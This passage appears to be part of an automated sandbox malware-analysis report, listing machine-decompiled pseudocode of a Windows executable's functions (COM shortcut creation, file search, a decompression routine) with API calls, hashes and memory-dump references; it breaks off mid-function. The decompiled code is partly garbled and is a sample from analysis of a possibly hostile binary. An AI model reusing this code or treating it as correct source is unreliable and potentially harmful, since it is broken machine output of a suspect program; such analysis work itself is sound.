                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                        • API String ID: 2624150263-1655598669
                                                                                        • Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                        • Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
                                                                                        • Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                        • Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 74%
                                                                                        			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C52( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                                        0x00402174
                                                                                        0x0040217e
                                                                                        0x00402188
                                                                                        0x00402195
                                                                                        0x004021a0
                                                                                        0x004021a3
                                                                                        0x004021bd
                                                                                        0x004021c3
                                                                                        0x004021c9
                                                                                        0x004021cc
                                                                                        0x004021d6
                                                                                        0x004021da
                                                                                        0x004021da
                                                                                        0x004021df
                                                                                        0x004021f0
                                                                                        0x004021f8
                                                                                        0x004022d4
                                                                                        0x004022d4
                                                                                        0x004022db
                                                                                        0x004021fe
                                                                                        0x004021fe
                                                                                        0x0040220d
                                                                                        0x00402211
                                                                                        0x00402214
                                                                                        0x0040221a
                                                                                        0x00402228
                                                                                        0x0040222b
                                                                                        0x0040222d
                                                                                        0x00402238
                                                                                        0x00402238
                                                                                        0x0040223d
                                                                                        0x0040223f
                                                                                        0x00402246
                                                                                        0x00402246
                                                                                        0x00402249
                                                                                        0x00402252
                                                                                        0x00402255
                                                                                        0x0040225a
                                                                                        0x0040225c
                                                                                        0x00402269
                                                                                        0x00402269
                                                                                        0x0040226c
                                                                                        0x00402278
                                                                                        0x0040227b
                                                                                        0x00402284
                                                                                        0x0040228a
                                                                                        0x00402291
                                                                                        0x004022aa
                                                                                        0x004022ac
                                                                                        0x004022ba
                                                                                        0x004022ba
                                                                                        0x004022aa
                                                                                        0x004022bd
                                                                                        0x004022c3
                                                                                        0x004022c3
                                                                                        0x004022c6
                                                                                        0x004022cc
                                                                                        0x004022d2
                                                                                        0x004022e7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004022d2
                                                                                        0x004022dd
                                                                                        0x00402a5d
                                                                                        0x00402a69

                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                        • API String ID: 123533781-1104044542
                                                                                        • Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                        • Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
                                                                                        • Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                        • Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 39%
                                                                                        			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E004061AB(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E0040624D();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                        0x004027b9
                                                                                        0x004027cd
                                                                                        0x004027d8
                                                                                        0x004027d9
                                                                                        0x00402918
                                                                                        0x004027bb
                                                                                        0x004027bb
                                                                                        0x004027bd
                                                                                        0x004027bf
                                                                                        0x004027bf
                                                                                        0x00402a5d
                                                                                        0x00402a69

                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                        • Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
                                                                                        • Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                        • Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406A9B, Relevance: .3, Instructions: 334COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 79%
                                                                                        			E00406A9B(signed int __ebx, signed int* __esi) {
				signed int _t367;
				signed int _t396;
				signed int _t413;
				signed int _t414;
				signed int* _t417;
				void* _t419;

				L0:
				while(1) {
					L0:
					_t417 = __esi;
					_t396 = __ebx;
					if( *(_t419 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t414 = _t413 | 0xffffffff;
							 *_t417 = 0x11;
							L10:
							_t417[0x147] =  *(_t419 - 0x40);
							_t417[0x146] = _t396;
							( *(_t419 + 8))[1] =  *(_t419 - 0x34);
							L11:
							 *( *(_t419 + 8)) =  *(_t419 - 0x38);
							_t417[0x26ea] =  *(_t419 - 0x30);
							E0040720A( *(_t419 + 8));
							return _t414;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L159;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L157:
									_t367 =  *_t417;
									if(_t367 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t367 * 4 +  &M004071CA))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L159;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L157;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L157;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L157;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L159;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L159;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L157;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L157;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L159;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											_push(__esi);
											__al = __al | 0x0000008b;
											asm("enter 0xce2b, 0x81");
											goto ("bleWindow");
										case 6:
											L133:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L149:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L134:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L140:
												__esi[0x26ea] = __edi;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L160;
												} else {
													goto L149;
												}
											}
											L135:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L140;
											}
											L136:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L149;
											} else {
												goto L140;
											}
										case 7:
											L150:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t351 = __ebp - 0x38;
												 *_t351 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t351;
											}
											goto L152;
										case 8:
											L4:
											while(_t396 < 3) {
												if( *(_t419 - 0x34) == 0) {
													goto L159;
												} else {
													 *(_t419 - 0x34) =  *(_t419 - 0x34) - 1;
													 *(_t419 - 0x40) =  *(_t419 - 0x40) | ( *( *(_t419 - 0x38)) & 0x000000ff) << _t396;
													 *(_t419 - 0x38) =  &(( *(_t419 - 0x38))[1]);
													_t396 = _t396 + 8;
													continue;
												}
											}
											_t396 = _t396 - 3;
											 *(_t419 - 0x40) =  *(_t419 - 0x40) >> 3;
											_t377 =  *(_t419 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t379 = _t377 >> 1;
											_t417[0x145] = ( ~(_t377 & 0x00000001) & 0x00000007) + 8;
											if(_t379 == 0) {
												L24:
												 *_t417 = 9;
												_t407 = _t396 & 0x00000007;
												 *(_t419 - 0x40) =  *(_t419 - 0x40) >> _t407;
												_t396 = _t396 - _t407;
												goto L157;
											}
											L6:
											_t382 = _t379 - 1;
											if(_t382 == 0) {
												L13:
												__eflags =  *0x42e3d0;
												if( *0x42e3d0 != 0) {
													L22:
													_t383 =  *0x40a444; // 0x9
													_t417[4] = _t383;
													_t384 =  *0x40a448; // 0x5
													_t417[4] = _t384;
													_t385 =  *0x42d24c; // 0x0
													_t417[5] = _t385;
													_t386 =  *0x42d248; // 0x0
													_t417[6] = _t386;
													L23:
													 *_t417 =  *_t417 & 0x00000000;
													goto L157;
												} else {
													_t26 = _t419 - 8;
													 *_t26 =  *(_t419 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t387 = 0x42d250;
													do {
														L15:
														__eflags = _t387 - 0x42d48c;
														_t409 = 8;
														if(_t387 > 0x42d48c) {
															__eflags = _t387 - 0x42d650;
															if(_t387 >= 0x42d650) {
																__eflags = _t387 - 0x42d6b0;
																if(_t387 < 0x42d6b0) {
																	_t409 = 7;
																}
															} else {
																_t409 = 9;
															}
														}
														L20:
														 *_t387 = _t409;
														_t387 = _t387 + 4;
														__eflags = _t387 - 0x42d6d0;
													} while (_t387 < 0x42d6d0);
													E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t419 - 8);
													_push(0x1e);
													_pop(_t411);
													_push(5);
													_pop(_t390);
													memset(0x42d250, _t390, _t411 << 2);
													_t421 = _t421 + 0xc;
													_t413 = 0x42d250 + _t411;
													E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t419 - 8);
													 *0x42e3d0 =  *0x42e3d0 + 1;
													__eflags =  *0x42e3d0;
													goto L22;
												}
											}
											L7:
											_t394 = _t382 - 1;
											if(_t394 == 0) {
												 *_t417 = 0xb;
												goto L157;
											}
											L8:
											if(_t394 != 1) {
												goto L157;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L159;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L159;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L157;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
